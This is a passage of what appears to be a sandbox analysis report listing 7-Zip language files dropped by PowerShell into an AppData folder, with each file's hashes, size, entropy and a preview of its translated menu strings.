                                                                                                                                                          SSDEEP:192:iRJ98lWxEb5BvGIrd+mc1OTno+SXhbSIm1JjSvcQpK/w:ijK0GeIrQmEOTno+SXox1JjmpKo
                                                                                                                                                          MD5:641B90F9AEDFC68486D0D20B40F7ECA6
                                                                                                                                                          SHA1:0A683DD844534905336784FADD80498AFE26F6FA
                                                                                                                                                          SHA-256:87A4B9369FD51D76C9032C0E65C3C6221659E086798829072785BE589E55B839
                                                                                                                                                          SHA-512:567CB9F6C31D196A171E5A9C2726A39A9B3D351AC92D4ACF8624213A68C9033ACC31AFAAAD82AA9F5359F32D3A0CA40522E151B8370D553A41ABEB6A6E097078
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.30 : Milan Hrub...; 4.33 : Michal Molhanec..; 9.07 : Ji.. Mal.k..; 15.00 : Kry.tof .ern...;..;..;..;..;..;..;..0..7-Zip..Czech...e.tina..401..OK..Storno........&Ano..&Ne..Zav..&t..N.pov.da....Po&kra.ovat..440..Ano na &v.echno..N&e na v.echno..Zastavit..Spustit znovu..&Pozad...P&op.ed...Po&zastavit..Pozastaveno..Jste si jist., .e to chcete stornovat?..500..&Soubor...pr&avy..&Zobrazen...&Obl.ben...&N.stroje..N.po&v.da..540..&Otev..t..Otev..t u&vnit...Otev..t &mimo..&Zobrazit..&Upravit..&P.ejmenovat..Kop.rovat &do.....P.&esunout do.....Vymaza&t..&Rozd.lit soubor.....&Slou.it soubory.....Vlast&nosti..Pozn.mk&a..Vypo..tat kontroln. sou.et..Porovnat soubory..Vytvo.it slo.ku..Vytvo.it soubor..&Konec..Odk.zat..&Alternate Streams..600..Vybrat &v.e..Zru.it v.b.r v.e..&Invertovat v.b.r..Vybrat.....Zru.it v.b.r.....Vybrat podle typu..Zru.it v.b.r podle typu..700..&Velk. ikony..&Mal. ikony..&Seznam..&Podrobn

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\da.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8365
                                                                                                                                                          Entropy (8bit):5.033083436849625
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:7lsrCMNPOVDlCOd6NSv9MPdYJIG8YsYccAP6ox1OYSqMHCaQEzYcdD73Q5CTG:7lsrVwJCe6NzPdYJIG8YsYccuT1RSBCV
                                                                                                                                                          MD5:D8ABA2DA47C1031832957B75A6524737
                                                                                                                                                          SHA1:B83069EF9F7A08F18804AE966B8D18657E2907CD
                                                                                                                                                          SHA-256:F65026AE33D4302A7EF06A856F6F062C9730100F5A87D5C00FB3FEAF5FCD5805
                                                                                                                                                          SHA-512:82B5F4AB8E3E2310A98BE87B5CF2CBF04B7AEAE1798CD69529325EE74ADD40BDCA38EDA865A821F66436906D4F3224004F690CF406B532E116475D2B2424B570
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:;!@Lang2@!UTF-8!..; : Jakob Schmidt..; 9.07 : Kian Andersen, J.rgen Rasmussen..; 15.00 : 2016-11-25 : scootergrisen..;..;..;..;..;..;..;..;..0..7-Zip..Danish..Dansk..401..OK..Annuller........&Ja..&Nej..&Luk..Hj.lp....&Forts.t..440..Ja til &alle..Nej til a&lle..Stop..Genstart..&Baggrund..&Forgrund..&Pause..Sat p. pause..Er du sikker p., at du vil annullere?..500..&Filer..R&ediger..&Vis..F&avoritter..Funk&tioner..&Hj.lp..540..&.bn...bn &inden i...bn &uden for..&Vis..&Rediger..O&md.b..&Kopier til.....&Flyt til.....S&let..&Opdel fil.....Kom&biner filer.....&Egenskaber..Komme&ntar.....Udregn checksum..Sammenlign..Opret mappe..Opret fil..&Afslut..Opret/rediger henvisning..&Alternative str.mme..600..V.lg &alle..Frav.lg alle..&Omvendt markering..V.lg.....Frav.lg.....V.lg efter type..Frav.lg efter type..700..Sto&re ikoner..S&m. ikoner..&Liste..&Detaljer..730..Usorteret..Flad visning..&2 paneler..&V.rkt.jslinjer...bn rodmappe..Et niveau op..Mappehistorik.....&Opdater.

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\de.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9638
                                                                                                                                                          Entropy (8bit):5.0781244819805496
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:ifuT0Y83ghfM/5yT9lBJ/LQs6gIgiOvcLh3ahAHE+XAgiRTlu6ZgSboZDWUL+g9C:iG0D3ghcy7Ms6gIgiOktU+Iu6CS4L+g0
                                                                                                                                                          MD5:40AE22F5BCBEAB6F622771562D584F2B
                                                                                                                                                          SHA1:4EAA551055CCFA0076766B7BDF111DE9DBCC1C82
                                                                                                                                                          SHA-256:06E5265A2B30807296480DC0B0D3A27E41F1381D61229E4EB239C4930D14A43E
                                                                                                                                                          SHA-512:581A94DC12FE48AEBFD88453351697AED9DE5B1DECF4C5DD53CF4DB38D50727D3B887498F0BEE6BD532CFBDC8AF7BC01FC8D58CE0C3F6FAC235BC6FF3F843125
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 2.30 : Soeren Finster..; 4.07 : JAK-Software.DE..; 9.07 : Joachim Henke..;..;..;..;..;..;..;..;..0..7-Zip..German..Deutsch..401..OK..Abbrechen........&Ja..&Nein..&Schlie.en..Hilfe....&Fortsetzen..440..Ja f.r &alle..Nein f.r a&lle..Stopp..Neustart..&Hintergrund..&Vordergrund..&Pause..Pause..M.chten Sie wirklich abbrechen?..500..&Datei..&Bearbeiten..&Ansicht..&Favoriten..&Extras..&Hilfe..540...&ffnen..I&ntern .ffnen..E&xtern .ffnen..&Ansehen..&Bearbeiten..&Umbenennen..&Kopieren nach.....&Verschieben nach.....&L.schen..Datei auf&splitten.....Dateien &zusammenf.gen.....E&igenschaften..K&ommentieren..&Pr.fsumme berechnen..Ver&gleichen..Ordner erstellen..Datei erstellen..Be&enden..Verkn.pfung.....&Alternative Datenstr.me..600..Alles &markieren..Alles abw.hlen..Markierung &umkehren..Ausw.hlen.....Auswahl aufheben.....Nach Typ ausw.hlen..Nach Typ abw.hlen..700..&Gro.e Symbole..&Kleine Symbole..&Liste..&Details..730..Unsortiert..Alles in einer &Ebene..

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\el.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):17042
                                                                                                                                                          Entropy (8bit):4.484854048361814
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:iZF/smolE2pHjN6ZdrD2zH9bOrcjfnicC5aLoDNwSF:wNIEZRD2R5jfnic+aLoBwSF
                                                                                                                                                          MD5:812DF218DAE08F9F883A7455015707B2
                                                                                                                                                          SHA1:6E7D7D1C8E783B9B913F44DF515F4D376D3502C4
                                                                                                                                                          SHA-256:CF90A21C69A13E0D674B6B74E2904F7D9D3BEE594D89862155D94105311F47A7
                                                                                                                                                          SHA-512:51C3C6151B47FA5E3968604CC2385C5D0984CCB96B8F92982BD28440786E1B99826AA70AE1232465A3469DDB6C50D13A241B6A979387EB47BFF013953DB1ED07
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Vasileios Karakoidas, Jacaranda Bill, Vasilis Kosmidis..; 9.07 : SkyHi [HDManiacs Team]..; 15.00 : 2015-05-07: Pete D..;..;..;..;..;..;..;..;..0..7-Zip..Greek............401..OK...............&......&....&.....................&..........440..... .. &........ .. .&....&........................ &............... &...........&..................... ........ ... ...... .. .........;..500..&........&..............&...........&............&......&.........540....&.............. ... &.... ................. .. &... ...........&...........&............&...............&..............&.................&....&.......... ............&........ .....

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\eng.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7622
                                                                                                                                                          Entropy (8bit):5.026870141064363
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iZ76FtmZSw5U0LutH5EVCPXUoDzg3TMHig7v7iH+xb:iZnKtH5EVC/U2zg34Cg7Hb
                                                                                                                                                          MD5:8D7264236ADCA0407FA61D942B7E575E
                                                                                                                                                          SHA1:21861F62751D2E3D452146BA139E758F20DA6F6C
                                                                                                                                                          SHA-256:628366CBE1964564F8BCD0732ABFE08CC3F9A86FE761E41ABB41F84F7B6BA00A
                                                                                                                                                          SHA-512:74AB8E70FC3A685AE715368DF90E9F6B9630E6DC1091436C244AD486DB3FAF25BC59AC1B89F90E935E7EB2C6766E19165032FC24824AD8AF932AD95A8A34172B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 15.00 : 2015-03-29 : Igor Pavlov..;..;..;..;..;..;..;..;..;..;..0..7-Zip..English..English..401..OK..Cancel........&Yes..&No..&Close..Help....&Continue..440..Yes to &All..No to A&ll..Stop..Restart..&Background..&Foreground..&Pause..Paused..Are you sure you want to cancel?..500..&File..&Edit..&View..F&avorites..&Tools..&Help..540..&Open..Open &Inside..Open O&utside..&View..&Edit..Rena&me..&Copy To.....&Move To.....&Delete..&Split file.....Com&bine files.....P&roperties..Comme&nt.....Calculate checksum..Diff..Create Folder..Create File..E&xit..Link..&Alternate Streams..600..Select &All..Deselect All..&Invert Selection..Select.....Deselect.....Select by Type..Deselect by Type..700..Lar&ge Icons..S&mall Icons..&List..&Details..730..Unsorted..Flat View..&2 Panels..&Toolbars..Open Root Folder..Up One Level..Folders History.....&Refresh..Auto Refresh..750..Archive Toolbar..Standard Toolbar..Large Buttons..Show Buttons Text..800..&Add folder to Favorites as..Bookmark..90

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\es.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9797
                                                                                                                                                          Entropy (8bit):4.960723234256232
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:i3vSP1uIlLvt2WSBL7hBC2pjlRS03gyLuBODltrO9K:i3KPUIlrt29BdGK
                                                                                                                                                          MD5:5A449308A0176D6401181BEF4AF13765
                                                                                                                                                          SHA1:9D8BC3E801BCFB43C7DBFAB94AB91A4079A2070F
                                                                                                                                                          SHA-256:7DDDAE25296F14C1F45AC032D9C950C3A8D39A41489F9D2B06000EDCFA7A6660
                                                                                                                                                          SHA-512:2AEBD25219B12D88BDF7A4A1B90B6B13B4ED5D4215E15D2316494C56B7D696EEB3252478200BCF0D84160D11979F5A71C72CA110DD3E28E901CFDB13255C45B0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Pablo Rodriguez..; : Jbc25..; : 2007-09-05 : Guillermo Gabrielli..; 9.07 : 2010-06-10 : Purgossu..; 2010-10-23 : Sergi Medina (corrected) ..; 18.00 : 2018-01-10 : Agust.n Bou (updated)..;..;..;..;..;..0..7-Zip..Spanish..Espa.ol..401..Aceptar..Cancelar........&S...&No..&Cerrar..Ayuda....&Continuar..440..S. a &todo..No a t&odo..Parar..Volver a empezar..Se&gundo plano..P&rimer plano..&Pausa..Pausado...Est.s seguro de que deseas cancelar?..500..&Archivo..&Editar..&Ver..&Favoritos..&Herramientas..Ay&uda..540..&Abrir..Abrir &dentro..Abrir &fuera..&Ver..&Editar..Re&nombrar..&Copiar a.....&Mover a.....&Borrar..Di&vidir archivo.....C&ombinar archivos.....&Propiedades..Comen&tario..Suma de verificaci.n..Diff..Crear carpeta..Crear archivo..&Salir..Vincular..Flujos &alternativos..600..Seleccionar &todo..Deseleccionar todo..&Invertir selecci.n..Seleccionar.....Deseleccionar.....Seleccionar por tipo..Deseleccionar

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\et.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7214
                                                                                                                                                          Entropy (8bit):5.0177575463645425
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iz52C8/cUN7wdeSxU1ntA9i6fH4XKcmcb7cn:i92EA7jS99i6fH4XKc9b7cn
                                                                                                                                                          MD5:54D610C174514D0F60B382249885963C
                                                                                                                                                          SHA1:4D2C22BA3DA557A3E8641F8D5388123D96C8259F
                                                                                                                                                          SHA-256:D3FC7E1DD6F0486C99997B75D9D8C5592DA6CFB9B89C3EC4F59E7BC5826B3456
                                                                                                                                                          SHA-512:80D51CE4DAFA9967DDFA7A8BDF4F62351FA085A7059BC63F9427E0A5E70DC21CB917057F1A41B5E1A218138141DEDCADF02E18A0F028EBEE8316AAF4AD280D59
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 3.09 : Kaupo Suviste..; 9.07 : Mihkel T.nnov..;..;..;..;..;..;..;..;..;..0..7-Zip..Estonian..eesti keel..401..OK..Loobu........&Jah..&Ei..&Sulge..Abi....&J.tka..440..K.igile j&ah..K.igile e&i..Seiska..Restardi..&Taustal..&Esiplaanile..&Paus..Pausiks peatatud..Kas soovite kindlasti loobuda?..500..&Fail..&Redigeeri..&Vaade..&Lemmikud..&T..riistad..&Abi..540..&Ava..Ava s&ees..Ava v.ljasp&ool..Vaat&ur..&Redigeeri..&Nimeta .mber..&Kopeeri asukohta.....&Teisalda asukohta.....Ku&stuta..T.kel&da fail......&henda failid.....Atri&buudid..Ko&mmentaar.....Arvuta kontrollsumma..V.rdle..Loo kaust..Loo fail..&V.lju..600..V&ali k.ik..T.hista k.ik valikud..&P..ra valik..Vali.....T.hista valik.....Vali t..bi j.rgi..T.hista t..bi j.rgi valik..700..&Suured ikoonid..V.ik&esed ikoonid..&Loend...ksikasja&d..730..Sortimata..Lame vaade..&Kaks paani..&T..riistaribad..Ava juurkaust..Taseme v.rra .les..Kaustaajalugu.....&V.rskenda..750..Arhiiviriistariba..S

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\eu.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8894
                                                                                                                                                          Entropy (8bit):4.789524765462384
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:igp4YY4DAQwPnrVpoL2Q03nCIQJ861JcBkoZEU4DHYUv:i0JvVwPrVp9lQxHcBkoZEU47v
                                                                                                                                                          MD5:29EC04893F6B2C9058A8F1E0BEAF9081
                                                                                                                                                          SHA1:8E7B5A0EC24153AA7BE02F0395C003DF02CF6A09
                                                                                                                                                          SHA-256:536D93CA6D7C96D203B51333C4E78DE2429F78D32CC321461589626759C84127
                                                                                                                                                          SHA-512:B84E6606A5F58392DE5C5F8113DB10B8212A82BB93367469284AD2DD9A961BF381E3D230179EC19A32CAE7A266CDDE7290D95A262DEA247B267FDCE905F89972
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 15.12 : 2015-12-04 : Xabier Aramendi..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Basque..Euskara..401..&Ongi..E&zeztatu........&Bai..&Ez..It&xi..&Laguntza....&Jarraitu..440..Bai &Guztiari..Ez G&uztiari..Gelditu..Berrabiarazi..Ba&rrenean..&Gainean..&Pausatu..Pausatuta..Zihur zaude ezeztatzea nahi duzula?..500..&Agiria..&Editatu..&Ikusi..&Gogokoenak..&Tresnak..&Laguntza..540..&Ireki..Ireki &Barnean..Ireki &Kanpoan..Ik&usi..&Editatu..Berrize&ndatu..Kopiatu &Hona.....&Mugitu Hona.....E&zabatu..Banan&du agiria.....Nahas&tu agiriak.....Ezau&garriak..&Aipamena.....Ka&lkulatu egiaztapen-batura..Ezber..Sortu Agiritegia..S&ortu Agiria..I&rten..Lotura..&Aldikatu Jarioak..600..Hautatu &Guztiak..Deshatutau G&uztiak..&Alderantzizkatu Hautapena..&Hautatu.....&Deshautatu.....Hautatu &Motaz..Deshautatu M&otaz..700..Ikur &Handiak..Ikur Txi&kiak..&Zerrenda..&Xehetasunak..730..Ant&olatugabe..Ik&uspegi Laua..&2 Panel..&Tresnabarrak..Ireki &Erro Agiritegia..Maila Bat &Gora..Agiritegi &H

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\ext.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7791
                                                                                                                                                          Entropy (8bit):5.01233595181642
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:i+TjfUOQlhcX2jsmnNKjgwlgI34gjwhS9kj6P3eW15Qm0ImA6uBacIUmHm:igLQUmjRt0wD6PHPD0IhBt
                                                                                                                                                          MD5:F048977CDC74FF4D1F045FB3FD5D0118
                                                                                                                                                          SHA1:4D44F8644A0D41FDDE9F7D7732B197A4EBB65DAE
                                                                                                                                                          SHA-256:3CD8B8633FBC076EE07BF58DA6E01AB692DF461381A2BAD4EF5512C653DA46E4
                                                                                                                                                          SHA-512:48011FBFFA45F8809FC6E7D1E8899EE29D4CC6BE2CDE36484301E71A3C3FFB85CCA6CCA6A9E9E79AF5355B1309834F67D62100AD09AEC852D152ACA3688D129B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Miguel Angel..; 9.07 : Purgossu..;..;..;..;..;..;..;..;..;..0..7-Zip..Extremaduran..Estreme.u..401..Acetal..Cancelal........&S...&Nu..&Fechal..Ayua....A&continal..440..S. &a t...Nu a &t...Paral..Reinicial..Se&gundu pranu..&Primel pranu..&Paral..Parau..De siguru que quieri cancelal la operaci.n?..500..&Archivu..&Eital..&Vel..A&tihus..&Herramientas..A&yua..540..&Abril..Abril &dentru..Abril &huera..&Vel..&Eital..Renom&bral..&Copial a.....&Movel pa.....&Eliminal..De&sapartal ficheru.....Com&binal ficherus.....P&ropieais..Come&ntariu..Calculal suma e verificaci.n..Diff..Creal diret.riu..Creal ficheru..&Salil..600..Selecional &t...Deselecional t...&Invertil seleci.n..Selecional.....Deselecional.....Selecional pol tipu..Deselecional pol tipu..700..Iconus g&randis..Iconus caquerus..&Listau..&Detallis..730..Nu soportau..Vista prana..&2 panelis..Barra e herramien&tas..Abril diret.riu ra...Subil un nivel..Estorial de diret.rius.....&Atualizal..750..Ba

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\fa.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):10768
                                                                                                                                                          Entropy (8bit):4.471491018171749
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iSExioqnlY02IxV2ew79hLxH1jIxOw/E9u7tWN/Up73om1qvu:iSEx22j+8TxH1I0zY7hp7V
                                                                                                                                                          MD5:952328B44391B1D4196DFE1F832A16A2
                                                                                                                                                          SHA1:7BF9CED7D272D2DF60D2D3984333A6BB26A69377
                                                                                                                                                          SHA-256:05851BA54B24D7FD45179419AEE91A2D40BCAB62E6AAB99C1A92189FB636BBB2
                                                                                                                                                          SHA-512:34CC2908320E349D04BABF2E5039DFC18B6AAF9F39BEA6192E9D53BCED3C661C847CCE8A17B9AA6BCB941390DA9A7AC40B28A93903C9F1946152A7FD93F43AEF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 3.12 : Edris Naderan..; 4.53 : Mehdi Farhadi..; 9.22 : Hessam Mohamadi..;..;..;..;..;..;..;..;..0..7-Zip..Farsi.........401.......................&...&............................440..... ... ....... ... ...................... .......... ....................... ........ ...... .. ... .........500................................. .....................540.................. .. ............. .. ................................... ............. ................. .............. ............................... ..... ...... .......... ......... ........... ............600........ ........ ....... ........... .....................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\fi.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8719
                                                                                                                                                          Entropy (8bit):4.854557956353677
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:i39+pcahf+fftkY41jF7gEh+fHPZk8fh39BbTk3iTOATOelpwPFy:i39+p3GfixF1gEh+Jk8VDkF3elec
                                                                                                                                                          MD5:7AC9D88F81AACEF8759E510E9601A4B9
                                                                                                                                                          SHA1:249FE906A2D5A8E084CAD76E3E67DAD26C77BDB1
                                                                                                                                                          SHA-256:24D66C5733314F3F72B7CA0F5CEB5A3246726DDDEFCF2F033715188EDB062DB5
                                                                                                                                                          SHA-512:00B67A09CC101C557B7C9A5EA623E654407A953FE87EBB5786A7A2E8BA1944130BA4026A64BF83952A14E7A7C719F81351D8A84FE0B3FE9BA553E4796E7A7EC1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 3.08 : Ari Ryynanen..; 4.30 : Jarko P...; 4.42 : Juhani Valtasalmi..; 9.35b : T.Sakkara..; 15.05 : 2015-08-07 : Lauri Kentt...; (19.00): 2020-12-28 : Sampo Hippel.inen..;..;..;..;..;..0..7-Zip..Finnish..Suomi..401..OK..Peruuta........&Kyll...&Ei..&Sulje..Ohje....&Jatka..440..Kyll. k&aikkiin..E&i kaikkiin..Pys.yt...Aloita uudelleen..Aja &taustalla..Aja &edustalla..&Tauko..Tauolla..Peruutetaanko toiminto?..500..&Tiedosto..&Muokkaa..&N.yt...&Suosikit..Ty.&kalut..&Ohje..540..&Avaa..Avaa s&is.isesti..Avaa ulkoisesti..&N.yt...&Muokkaa..Nime. &uudelleen..&Kopioi.....&Siirr......&Poista..&Jaa osiin.....&Yhdist. jaetut.....&Ominaisuudet..Ku&vaus..Laske tarkiste..Erot..Luo kansio..Luo tiedosto..&Lopeta..Linkit...Vaihtoehtoiset virrat..600..V&alitse kaikki..Poista &valinnat..&K..nteinen valinta..Valitse.....Poista valinta.....Valitse tyypeitt.in..Poista valinta tyypeitt.in..700..Suu&ret kuvakkeet..&Pienet kuvakkeet..&Luettelo..&Tiedot..730..Alkuper.

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\fr.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9910
                                                                                                                                                          Entropy (8bit):4.9823070549494775
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iNbWj/xYCMXHxl759OMLpwPGzfejsH0qNXRDvG2oZ56LXlX+78+LF3Af7Br1T:iW/0Xxl7fOkpwufqsH0EhbG22KXlu783
                                                                                                                                                          MD5:B1B6E1C3CF5247EC1618A88F9853D54D
                                                                                                                                                          SHA1:0671CB77AD76F9E27237AA538F8EFA6BCCC40DE3
                                                                                                                                                          SHA-256:CC283E9B0C1822F757372C21F179710C4592A2F7755E706C48065BCFE70BBA5B
                                                                                                                                                          SHA-512:045422D358B3348A1E52CCED12D70757A7E6026801113EB68F07A399ACC75B6ECC9A1A4401CB7A65506C6F61D4FBB348765B0C80080072BFE06E0500CF31B0AC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.07 : Nicolas Sierro..; 9.07 : Philippe Berthault..; 15.14 : Sylvain St-Amand (SSTSylvain)..;..;..;..;..;..;..;..;..0..7-Zip..French..Fran.ais..401..OK..Annuler........&Oui..&Non..&Fermer..Aide....&Continuer..440..Oui pour &Tous..Non pour T&ous..Arr.ter..Red.marrer..&Arri.re-plan..P&remier plan..&Pause..En pause...tes-vous sur de vouloir annuler ?..500..&Fichier..&.dition..Affic&hage..Fa&voris..&Outils..&Aide..540..&Ouvrir..Ouvrir . l'&int.rieur..Ouvrir . l'e&xt.rieur..&Voir..&.dition..Reno&mmer..&Copier vers.....&D.placer vers.....S&upprimer..Diviser le &fichier.....Combiner les fic&hiers.....P&ropri.t.s..Comme&ntaire.....Somme de contr.le..Diff..Cr.er un dossier..Cr.er un fichier..&Quitter..Lien..Flux &Alternatif..600..S.lectionner &Tout..D.s.lectionner Tout..&Inverser la S.lection..S.lectionner.....D.s.lectionner.....S.lectionner par Sorte..D.s.lectionner par Sorte..700..&Grandes Ic.nes..&Petites Ic.nes..&Liste..&D.tails..730..

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\fur.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7679
                                                                                                                                                          Entropy (8bit):5.006541518255033
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:i3er20XT2wwImuvDQjdkg9E3JIWQ+iWPNULtCG+ydZystz3:i3erJD2wRmubQL9EuiULtCG+ydksZ3
                                                                                                                                                          MD5:DFD698A0F6ED7BF405A8FDD6F33B2315
                                                                                                                                                          SHA1:A8CDBC14AD118C61D484CD62E8C4E7D1141FBB4E
                                                                                                                                                          SHA-256:FC944EAA7883341372EBD5EF0E2F236CA248B2996A902240A75218541B600E72
                                                                                                                                                          SHA-512:07C5CD9EDEDC00FC28F878D83D327D91A91EDC236B51D05CD8171E43BB175072FE9BF0A4C89D09E21441D8192B08E5C3E5E156FA132B1C657715A5B7CB0488A6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.60 : Andrea Decorte (Klenje) : http://softfurlan.altervista.org : secont l'ortografie ufici.l de Provincie di Udin..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Friulian..Furlan..401..Va ben..Scancele........&S...&No..&Siare..&Jutori....&Continue..440..S. &a ducj..No a &ducj..Ferme..Torne a invi...&Sfont..P&rin plan..&Pause..In pause..S.stu sig.r di vol. scancel.?..500..&File..&Modifiche..&Viodude..&Prefer.ts..&Imprescj..&Jutori..540..&Viar...Viar. dentri 7-&Zip..V&iar. f.r di 7-Zip..&Mostre..M&odifiche..Gambie &non..&Copie in.....M.&f in.....&Elimine..&Div.t file.....Torne a &un. files.....P&ropiet.ts..Comen&t..Calcole so&me di control....Cree cartele..Cree file..V&a f.r..600..Selezione d&ut..&Deselezione dut..&Invert.s selezion..Selezione.....Deselezione.....Selezione par gjenar..Deselezione par gjenar..700..Iconis &grandis..Iconis &pi.ulis..&Liste..&Detais..730..Cence ordin..Viodude plane..&2 panei..Sbaris dai impresc&j..Viar. cartele princi

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\fy.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):6498
                                                                                                                                                          Entropy (8bit):5.016824364093303
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:ikdpohFyPI4mHJR/eVMIBNgjJdMe1bEIVo5XT3EVULQ:ikmvpRGVwj7Me1bEQgDEV9
                                                                                                                                                          MD5:0111890C0137974FCE2D79B6D22E5686
                                                                                                                                                          SHA1:98AB055FA8BF5F410CAD55627424D6512338A4A1
                                                                                                                                                          SHA-256:9FE460264AF4ABD9FF23EAB79387EBB52B4498758645CD5721E75FD7B747E536
                                                                                                                                                          SHA-512:86ACDB4D62BF9C784BF21999CBA5FA3674E70FE5647FDF1DC6A9C5B3CF9C182A18272D9C8400D997BB09E12C908E08A87A951C3D0156A134802E00F70DD1AD90
